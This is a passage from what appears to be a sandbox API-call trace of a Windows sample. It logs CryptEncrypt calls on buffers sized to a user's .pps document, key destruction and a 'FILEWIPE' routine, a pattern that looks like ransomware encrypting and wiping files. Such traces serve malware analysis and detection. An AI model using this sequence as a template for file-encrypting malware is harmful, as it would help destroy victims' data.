(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.656] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.657] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xa240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xa250) returned 1 [0033.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.657] CharLowerBuffW (in: lpsz="byte[41553]", cchLength=0xb | out: lpsz="byte[41553]") returned 0xb [0033.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.659] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.659] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ce698*, pdwDataLen=0x6ae220*=0xa240, dwBufLen=0xa250 | out: pbData=0x8ce698*, pdwDataLen=0x6ae220*=0xa250) returned 1 [0033.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.661] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.661] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.661] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.661] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.661] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.661] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.661] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.662] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.662] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.662] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.665] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.665] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.665] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.666] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.666] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.666] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.667] CryptDestroyKey (hKey=0x7c2280) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.667] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.667] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.667] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.667] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.668] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.668] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.668] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.668] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.669] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.669] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.669] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.669] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.669] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.670] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.670] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.670] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.670] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.670] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.670] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.670] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.672] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.674] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x64701b50, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x0, dwReserved1=0x777648, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0x7c2100 [0033.674] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.674] CharLowerBuffW (in: lpsz="byte[41536]", cchLength=0xb | out: lpsz="byte[41536]") returned 0xb [0033.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.675] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.675] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.675] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.675] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: 